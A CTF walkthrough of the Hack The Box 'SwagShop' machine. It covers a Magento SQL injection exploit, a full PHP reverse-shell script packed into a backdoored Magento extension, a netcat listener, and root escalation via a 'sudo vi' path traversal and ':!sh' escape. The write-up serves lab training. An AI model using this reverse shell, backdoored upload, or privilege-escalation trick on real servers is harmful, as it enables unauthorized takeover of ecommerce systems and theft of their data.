Hi there, this is SwagShop machine walkthrough. An easy box with poor connection 😒 and always got reset by other users. Once we get root on this box, we can try the Beta version of Hack the Box Store 😎.
Information
- OS: Linux
- IP: 10.10.10.140
- Difficulty: Easy
Enumeration
First, let's start start with nmap scan for the opened ports.
# nmap -sV -sC -A -Pn 10.10.10.140
Starting Nmap 7.30 ( https://nmap.org ) at 2019-06-04 15:55 KST
Nmap scan report for 10.10.10.140
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|_ 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.17 seconds
The SSH service is running, but I don't have any login information. So, let see what port 80 does. It is a webpage with titled Magento. I googled Magento
and it is a eCommerce plateform using PHP.
Magento SQL Injection Vulnerability
I start search for magento vulnerability
on google and the first thing that come frist is SQL Injection effect to some version of Magento.
Hmmm... I didn't check the version of Magento but I still try searching google for magento sql injection exploit db
.
Yeah, the first result from google is interesting. I try using the exploit code from Exploit-DB by downloading and modify some code by changing the target
as below.
target = "http://10.10.10.140/index.php"
And run the code.
# python 37977.py
WORKED
Check http://10.10.10.140/index.php/admin with creds forme:forme
The SQL Injection script does works. So now I try login with the username forme
and password forme
and it goes in to the admin panel.
Shell Uploading
Normally, after login to the dashboard, I usually find for the place for uploading file or shell. But Magento dashboard is new to me so I do some more googling for help xD.
After search for magento uplaod shell
and see some video on YouTube, I can find a place to upload file by go in to http://10.10.10.140/downloader
and login with the previous user and password. I try to uplaod PHP shell directly but it doesn't allow since it accepts only the package file.
So, I search for magento shell
and I found this one LINK. Since they provided the source code, so we can put the reverse shell code inside the php file (it's may easier lol).
I modify the IndexController.php
file inside Backdoor Code/app/code/community/Lavalamp/Connector/controllers/
by adding reverse shell script as follow.
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = 'my_ip_address';
$port = 1234;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
class Lavalamp_Connector_IndexController extends Mage_Core_Controller_Front_Action
{
public function indexAction()
{
echo "<h1>Ehhh xD</h1>";
}
}
?>
After modifying, I simply follow the README.md instruction to re-packaging the files.
cd Backdoor\ Code
tar -czvf xd.tgz app package.xml skin
mv bd.tgz ..
So now I can upload the reverse shell to the server,
Get access to the machine
On my machine, I run netcat -lvnp 1234
as the reverse shell listener. Then just open the uploaded reverse shell by the link http://10.10.10.140/index.php/lavalamp/index
.
Now I'm in the machine as www-data
user.
$ netcat -lvnp 1234 Chhaileng@Chhailengs-MacBook-Pro
Connection from 10.10.10.140:54626
Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
04:13:14 up 0 min, 0 users, load average: 0.29, 0.08, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@swagshop:/$ ls /home
haris
www-data@swagshop:/$ cd /home/haris
www-data@swagshop:/home/haris$ ls -l
-rw-r--r-- 1 haris haris 33 May 8 09:01 user.txt
www-data@swagshop:/home/haris$ cat user.txt
a4****************************c8
Root
I start with searching for exploit of the kernel but it seems like it doesn't work.
www-data@swagshop:/home/haris$ uname -a
Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
I try a lot of methods but it doesn't work. @@ Finally, after searching for help on google, I run sudo -l
and see some interesting information.
www-data@swagshop:/home/haris$ sudo -l
Matching Defaults entries for www-data on swagshop:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*
www-data@swagshop:/home/haris$
As I see is, user www-data
can run the command vi
and anything in /var/www/html
. So, I start run the command sudo vi
but it prompts for the password input. Later I try with using full path of vi
. But it stills asking for password. This time I try using full path of allowed directory /var/www/html
.
www-data@swagshop:/home/haris$ sudo /usr/bin/vi /var/www/html/test.txt
It works. I have created a file name test.txt as root
user.
www-data@swagshop:/var/www/html$ ls -l | grep test
-rw-r--r-- 1 root root 5 Jun 4 04:31 test.txt
Since I see the permission is allowed for /var/www/html/*
which mean everying inside that directory. I try using ../
to exit to the /
directory and go for viewing /root/root.txt
.
www-data@swagshop:/var/www/html$ sudo /usr/bin/vi /var/www/html/../../../root/root.txt
Now I got the root flag xD
c2****************************21
___ ___
/| |/|\| |\
/_| ´ |.` |_\ We are open! (Almost)
| |. |
| |. | Join the beta HTB Swag Store!
|___|.__| https://hackthebox.store/password
PS: Use root flag as password!
~
~
"/var/www/html/../../../root/root.txt" 10L, 270C 1,1 All
If you want a tty root shell, just type : !sh
(like you use :q
to exit vi).
~
~
:!sh
# id
uid=0(root) gid=0(root) groups=0(root)
# python3 -c "import pty;pty.spawn('/bin/bash')"
root@swagshop:/var/www/html#
Rooted, now let's go to the SwagShop and explore some stuff xD
I ordered a t-shirt from SwagShop. By using root flag, I got free shipping from HTB Store and here it arrived...